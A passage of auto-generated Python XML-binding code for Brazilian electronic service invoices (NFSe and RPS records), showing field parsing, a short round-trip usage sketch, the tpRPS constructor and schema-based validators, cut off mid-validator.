self.validate_tpDataHora(self.DataEmissaoRPS)
elif nodeName_ == 'SituacaoRPS':
SituacaoRPS_ = child_.text
SituacaoRPS_ = self.gds_validate_string(SituacaoRPS_, node, 'SituacaoRPS')
self.SituacaoRPS = SituacaoRPS_
# validate type tpSituacaoRPS
self.validate_tpSituacaoRPS(self.SituacaoRPS)
elif nodeName_ == 'SerieRPSSubstituido':
SerieRPSSubstituido_ = child_.text
SerieRPSSubstituido_ = self.gds_validate_string(SerieRPSSubstituido_, node, 'SerieRPSSubstituido')
self.SerieRPSSubstituido = SerieRPSSubstituido_
# validate type tpSerieRPSSubstituido
self.validate_tpSerieRPSSubstituido(self.SerieRPSSubstituido)
elif nodeName_ == 'NumeroRPSSubstituido':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPSSubstituido')
self.NumeroRPSSubstituido = ival_
# validate type tpNumeroComZero
self.validate_tpNumeroComZero(self.NumeroRPSSubstituido)
elif nodeName_ == 'NumeroNFSeSubstituida':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNFSeSubstituida')
self.NumeroNFSeSubstituida = ival_
# validate type tpNumeroComZero
self.validate_tpNumeroComZero(self.NumeroNFSeSubstituida)
elif nodeName_ == 'DataEmissaoNFSeSubstituida':
DataEmissaoNFSeSubstituida_ = child_.text
DataEmissaoNFSeSubstituida_ = self.gds_validate_string(DataEmissaoNFSeSubstituida_, node, 'DataEmissaoNFSeSubstituida')
self.DataEmissaoNFSeSubstituida = DataEmissaoNFSeSubstituida_
# validate type tpDataHoraNulo
self.validate_tpDataHoraNulo(self.DataEmissaoNFSeSubstituida)
elif nodeName_ == 'SeriePrestacao':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'SeriePrestacao')
self.SeriePrestacao = ival_
# validate type tpSeriePrestacao
self.validate_tpSeriePrestacao(self.SeriePrestacao)
elif nodeName_ == 'InscricaoMunicipalTomador':
InscricaoMunicipalTomador_ = child_.text
InscricaoMunicipalTomador_ = self.gds_validate_string(InscricaoMunicipalTomador_, node, 'InscricaoMunicipalTomador')
self.InscricaoMunicipalTomador = InscricaoMunicipalTomador_
# validate type tpInscricaoMunicipalNulo
self.validate_tpInscricaoMunicipalNulo(self.InscricaoMunicipalTomador)
elif nodeName_ == 'CPFCNPJTomador':
CPFCNPJTomador_ = child_.text
CPFCNPJTomador_ = self.gds_validate_string(CPFCNPJTomador_, node, 'CPFCNPJTomador')
self.CPFCNPJTomador = CPFCNPJTomador_
# validate type tpCPFCNPJ
self.validate_tpCPFCNPJ(self.CPFCNPJTomador)
elif nodeName_ == 'RazaoSocialTomador':
RazaoSocialTomador_ = child_.text
RazaoSocialTomador_ = self.gds_validate_string(RazaoSocialTomador_, node, 'RazaoSocialTomador')
self.RazaoSocialTomador = RazaoSocialTomador_
# validate type tpRazaoSocial
self.validate_tpRazaoSocial(self.RazaoSocialTomador)
elif nodeName_ == 'DocTomadorEstrangeiro':
DocTomadorEstrangeiro_ = child_.text
DocTomadorEstrangeiro_ = self.gds_validate_string(DocTomadorEstrangeiro_, node, 'DocTomadorEstrangeiro')
self.DocTomadorEstrangeiro = DocTomadorEstrangeiro_
# validate type tpDocTomadorEstrangeiro
self.validate_tpDocTomadorEstrangeiro(self.DocTomadorEstrangeiro)
elif nodeName_ == 'TipoLogradouroTomador':
TipoLogradouroTomador_ = child_.text
TipoLogradouroTomador_ = self.gds_validate_string(TipoLogradouroTomador_, node, 'TipoLogradouroTomador')
self.TipoLogradouroTomador = TipoLogradouroTomador_
# validate type tpTipoLogradouro
self.validate_tpTipoLogradouro(self.TipoLogradouroTomador)
elif nodeName_ == 'LogradouroTomador':
LogradouroTomador_ = child_.text
LogradouroTomador_ = self.gds_validate_string(LogradouroTomador_, node, 'LogradouroTomador')
self.LogradouroTomador = LogradouroTomador_
# validate type tpLogradouro
self.validate_tpLogradouro(self.LogradouroTomador)
elif nodeName_ == 'NumeroEnderecoTomador':
NumeroEnderecoTomador_ = child_.text
NumeroEnderecoTomador_ = self.gds_validate_string(NumeroEnderecoTomador_, node, 'NumeroEnderecoTomador')
self.NumeroEnderecoTomador = NumeroEnderecoTomador_
# validate type tpNumeroEndereco
self.validate_tpNumeroEndereco(self.NumeroEnderecoTomador)
elif nodeName_ == 'ComplementoEnderecoTomador':
ComplementoEnderecoTomador_ = child_.text
ComplementoEnderecoTomador_ = self.gds_validate_string(ComplementoEnderecoTomador_, node, 'ComplementoEnderecoTomador')
self.ComplementoEnderecoTomador = ComplementoEnderecoTomador_
# validate type tpComplementoEndereco
self.validate_tpComplementoEndereco(self.ComplementoEnderecoTomador)
elif nodeName_ == 'TipoBairroTomador':
TipoBairroTomador_ = child_.text
TipoBairroTomador_ = self.gds_validate_string(TipoBairroTomador_, node, 'TipoBairroTomador')
self.TipoBairroTomador = TipoBairroTomador_
# validate type tpTipoBairro
self.validate_tpTipoBairro(self.TipoBairroTomador)
elif nodeName_ == 'BairroTomador':
BairroTomador_ = child_.text
BairroTomador_ = self.gds_validate_string(BairroTomador_, node, 'BairroTomador')
self.BairroTomador = BairroTomador_
# validate type tpBairro
self.validate_tpBairro(self.BairroTomador)
elif nodeName_ == 'CidadeTomador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'CidadeTomador')
self.CidadeTomador = ival_
# validate type tpCodCidade
self.validate_tpCodCidade(self.CidadeTomador)
elif nodeName_ == 'CidadeTomadorDescricao':
CidadeTomadorDescricao_ = child_.text
CidadeTomadorDescricao_ = self.gds_validate_string(CidadeTomadorDescricao_, node, 'CidadeTomadorDescricao')
self.CidadeTomadorDescricao = CidadeTomadorDescricao_
# validate type tpCidadeTomadorDescricao
self.validate_tpCidadeTomadorDescricao(self.CidadeTomadorDescricao)
elif nodeName_ == 'CEPTomador':
CEPTomador_ = child_.text
CEPTomador_ = self.gds_validate_string(CEPTomador_, node, 'CEPTomador')
self.CEPTomador = CEPTomador_
# validate type tpCEPNulo
self.validate_tpCEPNulo(self.CEPTomador)
elif nodeName_ == 'EmailTomador':
EmailTomador_ = child_.text
EmailTomador_ = self.gds_validate_string(EmailTomador_, node, 'EmailTomador')
self.EmailTomador = EmailTomador_
# validate type tpEmail
self.validate_tpEmail(self.EmailTomador)
elif nodeName_ == 'CodigoAtividade':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'CodigoAtividade')
self.CodigoAtividade = ival_
# validate type tpCodigoAtividade
self.validate_tpCodigoAtividade(self.CodigoAtividade)
elif nodeName_ == 'AliquotaAtividade':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaAtividade')
self.AliquotaAtividade = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaAtividade)
elif nodeName_ == 'TipoRecolhimento':
TipoRecolhimento_ = child_.text
TipoRecolhimento_ = self.gds_validate_string(TipoRecolhimento_, node, 'TipoRecolhimento')
self.TipoRecolhimento = TipoRecolhimento_
# validate type tpTipoRecolhimento
self.validate_tpTipoRecolhimento(self.TipoRecolhimento)
elif nodeName_ == 'MunicipioPrestacao':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'MunicipioPrestacao')
self.MunicipioPrestacao = ival_
# validate type tpCodCidade
self.validate_tpCodCidade(self.MunicipioPrestacao)
elif nodeName_ == 'MunicipioPrestacaoDescricao':
MunicipioPrestacaoDescricao_ = child_.text
MunicipioPrestacaoDescricao_ = self.gds_validate_string(MunicipioPrestacaoDescricao_, node, 'MunicipioPrestacaoDescricao')
self.MunicipioPrestacaoDescricao = MunicipioPrestacaoDescricao_
# validate type tpCidadeDescricao
self.validate_tpCidadeDescricao(self.MunicipioPrestacaoDescricao)
elif nodeName_ == 'Operacao':
Operacao_ = child_.text
Operacao_ = self.gds_validate_string(Operacao_, node, 'Operacao')
self.Operacao = Operacao_
# validate type tpOperacao
self.validate_tpOperacao(self.Operacao)
elif nodeName_ == 'Tributacao':
Tributacao_ = child_.text
Tributacao_ = self.gds_validate_string(Tributacao_, node, 'Tributacao')
self.Tributacao = Tributacao_
# validate type tpTributacao
self.validate_tpTributacao(self.Tributacao)
elif nodeName_ == 'ValorPIS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorPIS')
self.ValorPIS = fval_
# validate type tpValor
self.validate_tpValor(self.ValorPIS)
elif nodeName_ == 'ValorCOFINS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorCOFINS')
self.ValorCOFINS = fval_
# validate type tpValor
self.validate_tpValor(self.ValorCOFINS)
elif nodeName_ == 'ValorINSS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorINSS')
self.ValorINSS = fval_
# validate type tpValor
self.validate_tpValor(self.ValorINSS)
elif nodeName_ == 'ValorIR':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorIR')
self.ValorIR = fval_
# validate type tpValor
self.validate_tpValor(self.ValorIR)
elif nodeName_ == 'ValorCSLL':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorCSLL')
self.ValorCSLL = fval_
# validate type tpValor
self.validate_tpValor(self.ValorCSLL)
elif nodeName_ == 'AliquotaPIS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaPIS')
self.AliquotaPIS = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaPIS)
elif nodeName_ == 'AliquotaCOFINS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaCOFINS')
self.AliquotaCOFINS = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaCOFINS)
elif nodeName_ == 'AliquotaINSS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaINSS')
self.AliquotaINSS = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaINSS)
elif nodeName_ == 'AliquotaIR':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaIR')
self.AliquotaIR = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaIR)
elif nodeName_ == 'AliquotaCSLL':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaCSLL')
self.AliquotaCSLL = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaCSLL)
elif nodeName_ == 'DescricaoRPS':
DescricaoRPS_ = child_.text
DescricaoRPS_ = self.gds_validate_string(DescricaoRPS_, node, 'DescricaoRPS')
self.DescricaoRPS = DescricaoRPS_
# validate type tpDescricaoRPS
self.validate_tpDescricaoRPS(self.DescricaoRPS)
elif nodeName_ == 'DDDPrestador':
DDDPrestador_ = child_.text
DDDPrestador_ = self.gds_validate_string(DDDPrestador_, node, 'DDDPrestador')
self.DDDPrestador = DDDPrestador_
# validate type tpDDDNulo
self.validate_tpDDDNulo(self.DDDPrestador)
elif nodeName_ == 'TelefonePrestador':
TelefonePrestador_ = child_.text
TelefonePrestador_ = self.gds_validate_string(TelefonePrestador_, node, 'TelefonePrestador')
self.TelefonePrestador = TelefonePrestador_
# validate type tpFoneNulo
self.validate_tpFoneNulo(self.TelefonePrestador)
elif nodeName_ == 'DDDTomador':
DDDTomador_ = child_.text
DDDTomador_ = self.gds_validate_string(DDDTomador_, node, 'DDDTomador')
self.DDDTomador = DDDTomador_
# validate type tpDDDNulo
self.validate_tpDDDNulo(self.DDDTomador)
elif nodeName_ == 'TelefoneTomador':
TelefoneTomador_ = child_.text
TelefoneTomador_ = self.gds_validate_string(TelefoneTomador_, node, 'TelefoneTomador')
self.TelefoneTomador = TelefoneTomador_
# validate type tpFoneNulo
self.validate_tpFoneNulo(self.TelefoneTomador)
elif nodeName_ == 'MotCancelamento':
MotCancelamento_ = child_.text
MotCancelamento_ = self.gds_validate_string(MotCancelamento_, node, 'MotCancelamento')
self.MotCancelamento = MotCancelamento_
# validate type tpMotCancelamento
self.validate_tpMotCancelamento(self.MotCancelamento)
elif nodeName_ == 'CPFCNPJIntermediario':
CPFCNPJIntermediario_ = child_.text
CPFCNPJIntermediario_ = self.gds_validate_string(CPFCNPJIntermediario_, node, 'CPFCNPJIntermediario')
self.CPFCNPJIntermediario = CPFCNPJIntermediario_
# validate type tpCPFCNPJnulo
self.validate_tpCPFCNPJnulo(self.CPFCNPJIntermediario)
elif nodeName_ == 'Deducoes':
obj_ = tpListaDeducoes.factory()
obj_.build(child_)
self.Deducoes = obj_
obj_.original_tagname_ = 'Deducoes'
elif nodeName_ == 'Itens':
obj_ = tpListaItens.factory()
obj_.build(child_)
self.Itens = obj_
obj_.original_tagname_ = 'Itens'
# end class tpNFSe
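# Usage sketch (not part of the generated API; the helper name below is
# hypothetical). A minimal example of the parse -> build -> export round trip
# these bindings support, assuming lxml is installed and that tpNFSe's
# constructor, like the other generated classes in this file, defaults every
# field to None.
def _nfse_roundtrip_sketch(xml_bytes):
    """Build a tpNFSe from raw XML bytes and re-serialize it to a string."""
    from io import StringIO
    from lxml import etree
    root = etree.fromstring(xml_bytes)  # element for the <NFSe> node
    nfse = tpNFSe()           # assumption: no-arg constructor, fields all None
    nfse.build(root)          # populates fields via buildChildren()
    buf = StringIO()
    nfse.export(buf, 0, name_='NFSe')
    return buf.getvalue()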
class tpRPS(GeneratedsSuper):
"""Tipo que representa um RPS."""
subclass = None
superclass = None
def __init__(self, Id=None, Assinatura=None, InscricaoMunicipalPrestador=None, RazaoSocialPrestador=None, TipoRPS=None, SerieRPS=None, NumeroRPS=None, DataEmissaoRPS=None, SituacaoRPS=None, SerieRPSSubstituido=None, NumeroRPSSubstituido=None, NumeroNFSeSubstituida=None, DataEmissaoNFSeSubstituida=None, SeriePrestacao=None, InscricaoMunicipalTomador=None, CPFCNPJTomador=None, RazaoSocialTomador=None, DocTomadorEstrangeiro=None, TipoLogradouroTomador=None, LogradouroTomador=None, NumeroEnderecoTomador=None, ComplementoEnderecoTomador=None, TipoBairroTomador=None, BairroTomador=None, CidadeTomador=None, CidadeTomadorDescricao=None, CEPTomador=None, EmailTomador=None, CodigoAtividade=None, AliquotaAtividade=None, TipoRecolhimento=None, MunicipioPrestacao=None, MunicipioPrestacaoDescricao=None, Operacao=None, Tributacao=None, ValorPIS=None, ValorCOFINS=None, ValorINSS=None, ValorIR=None, ValorCSLL=None, AliquotaPIS=None, AliquotaCOFINS=None, AliquotaINSS=None, AliquotaIR=None, AliquotaCSLL=None, DescricaoRPS=None, DDDPrestador=None, TelefonePrestador=None, DDDTomador=None, TelefoneTomador=None, MotCancelamento=None, CPFCNPJIntermediario=None, Deducoes=None, Itens=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.Assinatura = Assinatura
self.validate_tpAssinatura(self.Assinatura)
self.InscricaoMunicipalPrestador = InscricaoMunicipalPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
self.RazaoSocialPrestador = RazaoSocialPrestador
self.validate_tpRazaoSocialPrestador(self.RazaoSocialPrestador)
self.TipoRPS = TipoRPS
self.validate_tpTipoRPS(self.TipoRPS)
self.SerieRPS = SerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
self.NumeroRPS = NumeroRPS
self.validate_tpNumero(self.NumeroRPS)
if isinstance(DataEmissaoRPS, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(DataEmissaoRPS, '%Y-%m-%dT%H:%M:%S')
else:
initvalue_ = DataEmissaoRPS
self.DataEmissaoRPS = initvalue_
self.SituacaoRPS = SituacaoRPS
self.validate_tpSituacaoRPS(self.SituacaoRPS)
self.SerieRPSSubstituido = SerieRPSSubstituido
self.validate_tpSerieRPSSubstituido(self.SerieRPSSubstituido)
self.NumeroRPSSubstituido = NumeroRPSSubstituido
self.validate_tpNumeroComZero(self.NumeroRPSSubstituido)
self.NumeroNFSeSubstituida = NumeroNFSeSubstituida
self.validate_tpNumeroComZero(self.NumeroNFSeSubstituida)
self.DataEmissaoNFSeSubstituida = DataEmissaoNFSeSubstituida
self.validate_tpDataNulo(self.DataEmissaoNFSeSubstituida)
self.SeriePrestacao = SeriePrestacao
self.validate_tpSeriePrestacao(self.SeriePrestacao)
self.InscricaoMunicipalTomador = InscricaoMunicipalTomador
self.validate_tpInscricaoMunicipalNulo(self.InscricaoMunicipalTomador)
self.CPFCNPJTomador = CPFCNPJTomador
self.validate_tpCPFCNPJ(self.CPFCNPJTomador)
self.RazaoSocialTomador = RazaoSocialTomador
self.validate_tpRazaoSocial(self.RazaoSocialTomador)
self.DocTomadorEstrangeiro = DocTomadorEstrangeiro
self.validate_tpDocTomadorEstrangeiro(self.DocTomadorEstrangeiro)
self.TipoLogradouroTomador = TipoLogradouroTomador
self.validate_tpTipoLogradouro(self.TipoLogradouroTomador)
self.LogradouroTomador = LogradouroTomador
self.validate_tpLogradouro(self.LogradouroTomador)
self.NumeroEnderecoTomador = NumeroEnderecoTomador
self.validate_tpNumeroEndereco(self.NumeroEnderecoTomador)
self.ComplementoEnderecoTomador = ComplementoEnderecoTomador
self.validate_tpComplementoEndereco(self.ComplementoEnderecoTomador)
self.TipoBairroTomador = TipoBairroTomador
self.validate_tpTipoBairro(self.TipoBairroTomador)
self.BairroTomador = BairroTomador
self.validate_tpBairro(self.BairroTomador)
self.CidadeTomador = CidadeTomador
self.validate_tpCodCidade(self.CidadeTomador)
self.CidadeTomadorDescricao = CidadeTomadorDescricao
self.validate_tpCidadeTomadorDescricao(self.CidadeTomadorDescricao)
self.CEPTomador = CEPTomador
self.validate_tpCEP(self.CEPTomador)
self.EmailTomador = EmailTomador
self.validate_tpEmail(self.EmailTomador)
self.CodigoAtividade = CodigoAtividade
self.validate_tpCodigoAtividade(self.CodigoAtividade)
self.AliquotaAtividade = AliquotaAtividade
self.validate_tpAliquota(self.AliquotaAtividade)
self.TipoRecolhimento = TipoRecolhimento
self.validate_tpTipoRecolhimento(self.TipoRecolhimento)
self.MunicipioPrestacao = MunicipioPrestacao
self.validate_tpCodCidade(self.MunicipioPrestacao)
self.MunicipioPrestacaoDescricao = MunicipioPrestacaoDescricao
self.validate_tpCidadeDescricao(self.MunicipioPrestacaoDescricao)
self.Operacao = Operacao
self.validate_tpOperacao(self.Operacao)
self.Tributacao = Tributacao
self.validate_tpTributacao(self.Tributacao)
self.ValorPIS = ValorPIS
self.validate_tpValor(self.ValorPIS)
self.ValorCOFINS = ValorCOFINS
self.validate_tpValor(self.ValorCOFINS)
self.ValorINSS = ValorINSS
self.validate_tpValor(self.ValorINSS)
self.ValorIR = ValorIR
self.validate_tpValor(self.ValorIR)
self.ValorCSLL = ValorCSLL
self.validate_tpValor(self.ValorCSLL)
self.AliquotaPIS = AliquotaPIS
self.validate_tpAliquota(self.AliquotaPIS)
self.AliquotaCOFINS = AliquotaCOFINS
self.validate_tpAliquota(self.AliquotaCOFINS)
self.AliquotaINSS = AliquotaINSS
self.validate_tpAliquota(self.AliquotaINSS)
self.AliquotaIR = AliquotaIR
self.validate_tpAliquota(self.AliquotaIR)
self.AliquotaCSLL = AliquotaCSLL
self.validate_tpAliquota(self.AliquotaCSLL)
self.DescricaoRPS = DescricaoRPS
self.validate_tpDescricaoRPS(self.DescricaoRPS)
self.DDDPrestador = DDDPrestador
self.validate_tpDDDNulo(self.DDDPrestador)
self.TelefonePrestador = TelefonePrestador
self.validate_tpFoneNulo(self.TelefonePrestador)
self.DDDTomador = DDDTomador
self.validate_tpDDDNulo(self.DDDTomador)
self.TelefoneTomador = TelefoneTomador
self.validate_tpFoneNulo(self.TelefoneTomador)
self.MotCancelamento = MotCancelamento
self.validate_tpMotCancelamento(self.MotCancelamento)
self.CPFCNPJIntermediario = CPFCNPJIntermediario
self.validate_tpCPFCNPJnulo(self.CPFCNPJIntermediario)
self.Deducoes = Deducoes
self.Itens = Itens
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpRPS)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpRPS.subclass:
return tpRPS.subclass(*args_, **kwargs_)
else:
return tpRPS(*args_, **kwargs_)
factory = staticmethod(factory)
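    # The subclass hooks above let an application substitute its own class at
    # parse time without editing this generated file. Sketch, with a
    # hypothetical subclass name:
    #
    #     class MyRPS(tpRPS):
    #         pass
    #     tpRPS.subclass = MyRPS
    #     obj = tpRPS.factory()  # now returns a MyRPS instance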
def validate_tpAssinatura(self, value):
# Validate type tpAssinatura, a restriction on xs:base64Binary.
if value is not None and Validate_simpletypes_:
pass
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpRazaoSocialPrestador(self, value):
# Validate type tpRazaoSocialPrestador, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 120:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpRazaoSocialPrestador' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpRazaoSocialPrestador' % {"value" : value.encode("utf-8")} )
def validate_tpTipoRPS(self, value):
# Validate type tpTipoRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['RPS']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTipoRPS' % {"value" : value.encode("utf-8")} )
if len(value) > 20:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoRPS' % {"value" : value.encode("utf-8")} )
def validate_tpSerieRPS(self, value):
# Validate type tpSerieRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['NF']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpSerieRPS' % {"value" : value.encode("utf-8")} )
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpSituacaoRPS(self, value):
# Validate type tpSituacaoRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['N', 'C']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpSituacaoRPS' % {"value" : value.encode("utf-8")} )
def validate_tpSerieRPSSubstituido(self, value):
# Validate type tpSerieRPSSubstituido, a restriction on None.
pass
def validate_tpNumeroComZero(self, value):
# Validate type tpNumeroComZero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumeroComZero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumeroComZero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumeroComZero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumeroComZero_patterns_, ))
validate_tpNumeroComZero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpDataNulo(self, value):
# Validate type tpDataNulo, a restriction on None.
pass
def validate_tpSeriePrestacao(self, value):
# Validate type tpSeriePrestacao, a restriction on xs:byte.
if value is not None and Validate_simpletypes_:
if value < 1:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpSeriePrestacao' % {"value" : value} )
if value > 99:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpSeriePrestacao' % {"value" : value} )
def validate_tpInscricaoMunicipalNulo(self, value):
# Validate type tpInscricaoMunicipalNulo, a restriction on None.
pass
def validate_tpCPFCNPJ(self, value):
# Validate type tpCPFCNPJ, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCPFCNPJ_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCPFCNPJ_patterns_, ))
validate_tpCPFCNPJ_patterns_ = [['^[0-9]{11}$|^[0-9]{14}$']]
def validate_tpRazaoSocial(self, value):
# Validate type tpRazaoSocial, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 120:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpRazaoSocial' % {"value" : value.encode("utf-8")} )
def validate_tpDocTomadorEstrangeiro(self, value):
# Validate type tpDocTomadorEstrangeiro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 20:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpDocTomadorEstrangeiro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpDocTomadorEstrangeiro' % {"value" : value.encode("utf-8")} )
def validate_tpTipoLogradouro(self, value):
# Validate type tpTipoLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
def validate_tpLogradouro(self, value):
# Validate type tpLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
def validate_tpNumeroEndereco(self, value):
# Validate type tpNumeroEndereco, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 9:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpNumeroEndereco' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpNumeroEndereco' % {"value" : value.encode("utf-8")} )
def validate_tpComplementoEndereco(self, value):
# Validate type tpComplementoEndereco, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 30:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpComplementoEndereco' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpComplementoEndereco' % {"value" : value.encode("utf-8")} )
def validate_tpTipoBairro(self, value):
# Validate type tpTipoBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
